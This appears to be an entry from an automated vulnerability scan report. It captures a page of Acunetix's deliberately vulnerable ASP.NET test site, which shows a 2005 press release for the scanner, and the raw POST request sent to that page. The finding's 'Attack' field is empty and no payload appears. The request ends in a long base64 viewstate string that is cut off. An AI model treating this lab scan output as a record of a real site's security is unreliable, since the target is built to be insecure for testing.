value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZW